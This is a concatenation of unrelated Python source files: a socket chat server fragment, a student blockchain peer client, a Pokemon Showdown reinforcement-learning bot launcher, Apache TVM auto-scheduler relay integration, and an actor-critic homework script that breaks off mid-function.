SERVER.bind(ADDR)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
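# A minimal companion client, sketched under the assumption that the server
# above runs on localhost with the same PORT (not part of the original file):
#   from socket import AF_INET, socket, SOCK_STREAM
#   client = socket(AF_INET, SOCK_STREAM)
#   client.connect(('127.0.0.1', 33000))
#   print(client.recv(1024).decode("utf8"))       # server greeting
#   client.send(bytes("hello everyone", "utf8"))  # broadcast to the room
#   client.send(bytes("{quit}", "utf8"))          # ask the server to drop us
#   client.close()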
|
peer.py
|
# peer.py - CS 60 Spring 2021
# Final Project - George McNulty, Karimi Itani, Boxian Wang, Gabe Kotsonis
# May 25th, 2021
#
# This program creates the class Peer, which is a UDP client program that helps implement the p2p aspect
# of the larger blockchain project. It interacts with the tracker which helps it communicate with the other peers in the network.
# import libraries
from socket import *
from threading import Thread, Lock
from blockchain import Blockchain
from block import Block
import time
import json
class Peer:
# NEED self_addr (for p2p) and tracker_addr to initialize
def __init__(self, self_addr=('babylon1.thayer.dartmouth.edu', 60806),
tracker_addr=('babylon1.thayer.dartmouth.edu', 60825), data_crit=lambda new_data, all_data: True):
# Blockchain, start with genesis
self.blockchain = Blockchain()
self.chain_lock = Lock()
# Peer List
self.peer_list = []
self.peer_lock = Lock()
# Threads
self.tracker_thread = Thread(target=self.listen_from_tracker)
self.peer_thread = Thread(target=self.listen_from_peers)
# Address of the tracker, and address of itself (for p2p)
self.tracker_addr = tracker_addr
self.self_addr = self_addr
# Variable to stop threads
self.stop = False
self.stop_lock = Lock()
# Function for controlling data addition
self.data_crit = data_crit
################### EXPOSED API #######################
def connect(self):
# start tracking thread
self.tracker_sock = socket(AF_INET, SOCK_STREAM)
self.tracker_thread.start()
time.sleep(0.5) # sleep to make sure thread got peer list before doing p2p
# start listening thread
self.peer_sock = socket(AF_INET, SOCK_DGRAM)
self.peer_sock.bind(self.self_addr)
self.peer_thread.start()
print("**Peer listening for messages**")
def disconnect(self):
# change stop to true
self.stop_lock.acquire()
self.stop = True
self.stop_lock.release()
# wait for threads to die
self.tracker_thread.join()
self.peer_thread.join()
print("**Peer disconencted**")
def get_data(self):
# get lock
self.chain_lock.acquire()
# return list
res = self.blockchain.get_data()
# release lock
self.chain_lock.release()
return res
def add_data(self, data):
# get lock, get hash, length
self.chain_lock.acquire()
prev_hash = self.blockchain.get_last_hash()
length = self.blockchain.get_length()
all_data = self.blockchain.get_data() # exclude the genesis block!
# release lock
self.chain_lock.release()
if not self.data_crit(data, all_data): return -1
# start mining
res = []
self.mining_thread = Thread(target=self.mine, args=(data, prev_hash, length, res))
self.mining_thread.start()
print("**Mining block**")
# wait for finish and retrieve resulting block
self.mining_thread.join()
new_block = res[0]
# get lock
self.chain_lock.acquire()
# check validity
if self.blockchain.verify_block(new_block):
print("**Block Verified, broadcasting...**")
# publicize new block
self.blockchain.add_block(new_block)
self.chain_lock.release()
self.broadcast_block(new_block)
return 1
else:
print("Verify failed; chain changed during mining")
# return failure
self.chain_lock.release()
return 0
#################### THREADS ##############################
# content of tracking thread, listens from tracker and update peer list
def listen_from_tracker(self):
# send SYN and my address
print("**Peer connectected to tracker**")
syn_msg = {'type': 'SYN', 'addr': self.self_addr}
self.tracker_sock.connect(self.tracker_addr)
self.tracker_sock.send(json.dumps(syn_msg).encode())
# listen; update peer list; wait for at most 5 seconds
self.tracker_sock.settimeout(5)
print("**Peer now listening to tracker**")
while True:
try:
track_msg = json.loads(self.tracker_sock.recv(1500).decode())
self.peer_lock.acquire()
                self.peer_list = [tuple(i) for i in track_msg]  # update the peer list while holding the lock
self.peer_lock.release()
except timeout: # check if we disconnected
self.stop_lock.acquire()
stop = self.stop
self.stop_lock.release()
if stop:
break
# send FIN
fin_msg = {'type': 'FIN', 'addr': self.self_addr}
self.tracker_sock.send(json.dumps(fin_msg).encode())
print("**Peer disconnected from tracker**")
# close connection
self.tracker_sock.shutdown(SHUT_RDWR)
self.tracker_sock.close()
def listen_from_peers(self):
# First request a copy of blockchain, start by finding a peer (if any)
valid_peer = None
self.peer_lock.acquire()
for p in self.peer_list:
if p != self.self_addr:
valid_peer = p
self.peer_lock.release()
# ask it for blockchain
if valid_peer is not None:
self.send_req(valid_peer)
# Then start handling messages; wait for at most 5 seconds
self.peer_sock.settimeout(5)
while True:
try:
packet, addr = self.peer_sock.recvfrom(65536)
peer_msg = json.loads(packet.decode())
# if got a block
if peer_msg['type'] == 'BLOCK':
print("**Received a block from peer " + addr[0] + "**")
new_block = Block.load_json(peer_msg['data'])
self.chain_lock.acquire()
# accept, or request entire chain, based on verification
if self.blockchain.verify_block(new_block) and self.data_crit(new_block.get_data(), self.blockchain.get_data()):
self.blockchain.add_block(new_block)
self.chain_lock.release()
print("**New block accepted**")
else:
self.chain_lock.release()
print("**New block does not match; sending request for whole chain**")
self.send_req(addr)
# if got a chain
elif peer_msg['type'] == 'CHAIN':
print("**Received a chain from peer " + addr[0] + "**")
new_chain = Blockchain.load_json(peer_msg['data'])
self.chain_lock.acquire()
# accept if new chain is longer and valid
if new_chain.verify_chain() and self.data_crit(None, new_chain.get_data()) and new_chain.get_length() > self.blockchain.get_length():
print("**New chain accepted**")
self.blockchain = new_chain
else:
print("**New chain rejected**")
self.chain_lock.release()
# if got a request
elif peer_msg['type'] == 'REQ':
print("**Received a request from peer " + addr[0] + "**")
self.send_blockchain(addr)
except timeout:
# check for stoppage
self.stop_lock.acquire()
stop = self.stop
self.stop_lock.release()
if stop:
break
# clean up
self.peer_sock.close()
    # mining thread: simply invokes Blockchain.mine_block
def mine(self, data, prev_hash, length, res):
new_block = Blockchain.mine_block(data, prev_hash, length)
res.append(new_block)
############### SENDING TO TRACKER & PEERS #############
# broadcast block to all peers except self
def broadcast_block(self, new_block):
self.peer_lock.acquire()
# forming block message
block_msg = {'type': 'BLOCK', 'data': new_block.to_json()}
for p in self.peer_list:
# sending block message
if p != self.self_addr:
self.peer_sock.sendto(json.dumps(block_msg).encode(), p)
print("**Block sent to all peers**")
self.peer_lock.release()
# send entire chain to one peer
def send_blockchain(self, peer):
self.chain_lock.acquire()
# forming chain message
chain_msg = {'type': 'CHAIN', 'data': self.blockchain.to_json()}
self.chain_lock.release()
# send it
print("**Blockchain sent to peer " + peer[0] + "**")
self.peer_sock.sendto(json.dumps(chain_msg).encode(), peer)
    # send a request to retrieve the blockchain from a peer
def send_req(self, peer):
# forming request
req_msg = {'type': 'REQ'}
# send it
print("**Request sent to peer " + peer[0] + "**")
self.peer_sock.sendto(json.dumps(req_msg).encode(), peer)
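# Usage sketch (hypothetical addresses; assumes a tracker from this project is
# already listening on tracker_addr):
#   peer = Peer(self_addr=('localhost', 60806), tracker_addr=('localhost', 60825))
#   peer.connect()
#   peer.add_data("some payload")  # mines a block and broadcasts it on success
#   print(peer.get_data())
#   peer.disconnect()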
|
main.py
|
#!/usr/bin/env python3
import logging
import threading
def start_showdown(**kwargs):
try:
import subprocess
print("Starting local Showdown server")
subprocess.run(["node", "Pokemon-Showdown/pokemon-showdown"])
except FileNotFoundError:
pass
import src.geniusect.config as config
from poke_env.player_configuration import PlayerConfiguration
from poke_env.server_configuration import ShowdownServerConfiguration
from src.geniusect.player.reinforcement_learning_player import RLPlayer
if __name__ == "__main__":
if config.get_train_against_ladder():
        server_configuration = ShowdownServerConfiguration
validate = False
log_level = logging.INFO
else:
thread = threading.Thread(target=start_showdown)
thread.start()
server_configuration = None
validate = True
log_level = logging.WARNING
env_player = RLPlayer(battle_format="gen8randombattle",
avatar=120,
train=True,
validate=validate,
log_level=log_level,
load_from_checkpoint=config.get_load_from_checkpoint(),
player_configuration=PlayerConfiguration(config.get_bot_username(), config.get_bot_password()),
server_configuration=server_configuration)
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import logging
import json
import threading
import tvm
from tvm import autotvm, te, transform
from tvm.runtime import convert_to_object
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_runtime_codegen
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=3,
config={"relay.backend.use_auto_scheduler": True},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
opt_mod, _ = relay.optimize(mod, target, params)
grc = graph_runtime_codegen.GraphRuntimeCodegen(None, target)
grc.codegen(opt_mod["main"])
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod, params, target, target_host=None, hardware_params=None, include_simple_tasks=False
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
if isinstance(target, str):
target = tvm.target.Target(target)
if isinstance(target_host, str):
target_host = tvm.target.Target(target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(target=call_all_topi_funcs, args=(mod, params, target))
build_thread.start()
build_thread.join()
    # query the compile engine to get the number of occurrences of all tasks
engine = relay.backend.compile_engine.get()
use_count_dict = {}
for k, v in engine.items():
use_count_dict[k] = v.use_count
# create search tasks
tasks = []
weights = []
for wkl_key, ccache_key in env.wkl_key_to_ccache_key.items():
dag = ComputeDAG(wkl_key)
tasks.append(SearchTask(dag, wkl_key, target, target_host, hardware_params))
weights.append(use_count_dict[ccache_key] + 1)
# clean the cached lowering results
engine.clear()
return tasks, weights
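# Illustrative call, as a sketch only (assumes a Relay module `mod` with
# matching `params` is already in scope):
#   tasks, weights = extract_tasks(mod, params, "llvm")
#   for task, weight in zip(tasks, weights):
#       print(task.workload_key, weight)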
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
    EXTRACT_COMPLEX_TASK_ONLY = 1  # same as EXTRACT_TASK but ignores tasks without complex ops
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.wkl_key_to_ccache_key = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, workload_key, ccache_key):
"""Add the workload key of a search task
Parameters
----------
workload_key: str
The workload key of a task
ccache_key: CCacheKey
The corresponding ccache_key of the task
"""
self.wkl_key_to_ccache_key[workload_key] = ccache_key
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get both input and output tensors
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
"""
layout_free_ops = []
inputs = []
visited = set()
def traverse(t):
if t in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t)
for t in outs:
traverse(t)
has_layout_free = len(layout_free_ops) > 0
return inputs + list(outs), has_layout_free
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(outs, has_complex_op):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
outs: List[Tensor]
The output tensors of topi compute functions
has_complex_op: bool
Whether the topi compute function includes at least one complex op.
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
        An initial schedule in the tracing mode.
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
io_tensors, has_layout_free = traverse_to_get_io_tensors(outs)
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.hash_key(), io_tensors)
# only enable layout rewrite for cpu backend
target = tvm.target.Target.current()
enable_layout_rewrite = "cpu" in target.keys
env = TracingEnvironment.current
if env is None:
# in the final build mode
state = DispatchContext.current.query(target, key, has_complex_op, dag)
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
elif env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
engine = relay.backend.compile_engine.get()
ccache_key = engine.get_current_ccache_key()
env.add_workload_key(key, ccache_key)
schedule = te.create_schedule([x.op for x in outs])
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if enable_layout_rewrite and has_layout_free:
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag)
if state is None:
return None
# rewrite the layout and update the context for the new dag
dag = ComputeDAG(outs)
new_dag = dag.rewrite_layout_from_state(state)
new_key = json.dumps((new_dag.hash_key(),))
if new_key != key:
dispatch_ctx.update(target, new_key, state)
return te.create_schedule([x.op for x in outs])
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return schedule
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
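# Usage sketch: for a te.Tensor `A` and index expressions i, j, calling
# remove_index_check(A) makes A(i, j) build a ProducerLoad directly, skipping
# the bounds checks in tvm.te.Tensor.__call__.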
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
|
train_ac_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
EPSILON = 1e-8
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
            output_activation: activation of the output layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR HW2 CODE HERE
with tf.variable_scope(scope):
layer = input_placeholder
for _ in range(n_layers):
layer = tf.layers.dense(layer, size, activation=activation)
output_placeholder = tf.layers.dense(layer, output_size, output_activation)
return output_placeholder
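# Sketch with hypothetical shapes: a 2-hidden-layer tanh MLP mapping a 4-dim
# observation to 2 logits:
#   ob_ph = tf.placeholder(tf.float32, shape=[None, 4])
#   logits = build_mlp(ob_ph, output_size=2, scope="example_mlp", n_layers=2, size=64)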
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in actor critic
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR HW2 CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name="advantage", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
scope = "nn_policy"
if self.discrete:
sy_logits_na = build_mlp(
sy_ob_no, self.ac_dim, scope, self.n_layers, self.size,
activation=tf.nn.relu, output_activation=None)
return sy_logits_na
else:
sy_mean = build_mlp(
sy_ob_no, self.ac_dim, scope, self.n_layers, self.size,
activation=tf.nn.relu, output_activation=None)
sy_logstd = tf.Variable(tf.zeros(self.ac_dim), name='sy_logstd')
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_std: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
with tf.variable_scope("sampled_action"):
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(shape=tf.shape(sy_mean))
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
with tf.variable_scope("log_probability_of_sampled_action"):
if self.discrete:
sy_logits_na = policy_parameters
sy_logprob_n = - tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=sy_ac_na,
logits=sy_logits_na)
else:
sy_mean, sy_logstd = policy_parameters
probabilities = tf.distributions.Normal(sy_mean, tf.exp(sy_logstd)).prob(sy_ac_na)
sy_logprob_n = tf.log(tf.reduce_prod(probabilities, axis=1))
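                # Note: multiplying per-dimension densities and then taking the
                # log can underflow for high-dimensional actions; summing
                # .log_prob(sy_ac_na) over axis=1 is the numerically safer
                # equivalent.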
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)
# define the critic
self.critic_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_critic",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob[None, :]}) # YOUR HW2 CODE HERE
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
# add the observation after taking a step to next_obs
# YOUR CODE HERE
next_obs.append(ob)
rewards.append(rew)
steps += 1
# If the episode ended, the corresponding terminal value is 1
# otherwise, it is 0
# YOUR CODE HERE
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
                at that timestep, or 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
# First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
# To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
# This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
# and V(s) when subtracting the baseline
# Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
# otherwise the values will grow without bound.
# YOUR CODE HERE
adv_n = []
v_s_tp1_n = self.sess.run(self.critic_prediction, feed_dict={
self.sy_ob_no: next_ob_no})
v_s_t_n = self.sess.run(self.critic_prediction, feed_dict={
self.sy_ob_no: ob_no})
q_n = re_n + self.gamma * v_s_tp1_n * (1-terminal_n)
adv_n = q_n - v_s_t_n
if self.normalize_advantages:
adv_n = np.array(adv_n)
adv_n = (adv_n - adv_n.mean()) / (adv_n.std() + EPSILON) # YOUR_HW2 CODE_HERE
return adv_n
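    # Worked example with made-up numbers: with gamma=0.99, r=1.0, V(s')=2.0,
    # V(s)=1.5 and terminal=0, Q = 1.0 + 0.99*2.0 = 2.98 and A = 2.98 - 1.5 = 1.48;
    # with terminal=1 the bootstrap term is cut off, so Q = 1.0 and A = -0.5.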
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
                at that timestep, or 0 if the episode did not end
returns:
nothing
"""
        # Use bootstrapped target values to update the critic
# Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
# In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
# Every self.num_grad_steps_per_target_update steps, recompute the target values
# by evaluating V(s') on the updated critic
# Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
# otherwise the values will grow without bound.
# YOUR CODE HERE
for i in range(self.num_target_updates):
target_n = []
v_s_tp1_n = self.sess.run(self.critic_prediction, feed_dict={
self.sy_ob_no: next_ob_no})
target_n = re_n + self.gamma * v_s_tp1_n * (1 - terminal_n)
for j in range(self.num_grad_steps_per_target_update):
self.sess.run(self.critic_update_op, feed_dict={
self.sy_target_n: target_n,
self.sy_ob_no: ob_no
})
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
self.sess.run(self.actor_update_op,
